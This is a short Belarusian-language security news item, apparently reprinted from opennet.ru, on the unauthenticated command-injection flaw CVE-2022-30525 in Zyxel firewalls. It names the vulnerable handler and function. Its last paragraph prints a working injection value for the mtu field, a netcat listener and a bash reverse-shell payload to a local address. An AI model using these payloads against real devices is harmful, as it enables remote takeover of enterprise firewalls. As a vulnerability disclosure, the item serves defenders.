У прыладах Zyxel серый ATP, VPN і USG FLEX, прызначаных для арганізацыі працы міжсеткавых экранаў, IDS і VPN на прадпрыемствах, выяўлена крытычная ўразлівасць (CVE-2022-30525), якая дазваляе вонкаваму атакаваламу без аўтэнтыфікацыі выканаць код на прыладзе з правамі карыстача nobody. Для здзяйснення нападу зламыснік павінен мець магчымасць адпраўкі на прыладу запытаў па пратаколе HTTP/HTTPS. Кампанія Zyxel ухіліла ўразлівасць у абнаўленні прашыўкі ZLD 5.30. Па дадзеных сэрвісу Shodan у наш час у глабальнай сетцы зафіксавана 16213 патэнцыйна ўразлівых прылад, якія прымаюць запыты па HTTP/HTTPS.
Эксплуатацыя робіцца праз адпраўку спецыяльна аформленых каманд да web-апрацоўшчыка /ztp/cgi-bin/handler, даступнага без аўтэнтыфікацыі. Праблема выклікана адсутнасцю належнай чысткі параметраў запыту пры выкананні ў сістэме каманд пры дапамозе выкліку os.system, выкарыстоўванага ў бібліятэцы lib_wan_settings.py і выкананага пры апрацоўцы аперацыі setWanPortSt.
Напрыклад, атакавалы можа перадаць у поле mtu радок “; ping 192.168.1.210; якая прывядзе да выканання ў сістэме каманды "ping 192.168.1.210". Для атрымання доступу да каманднай абалонкі можна запусціць на сваёй сістэме "nc -lvnp 1270", пасля чаго ініцыяваць зваротнае злучэнне (reverse shell) даслаўшы на прыладу запыт з параметрам '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
Крыніца: opennet.ru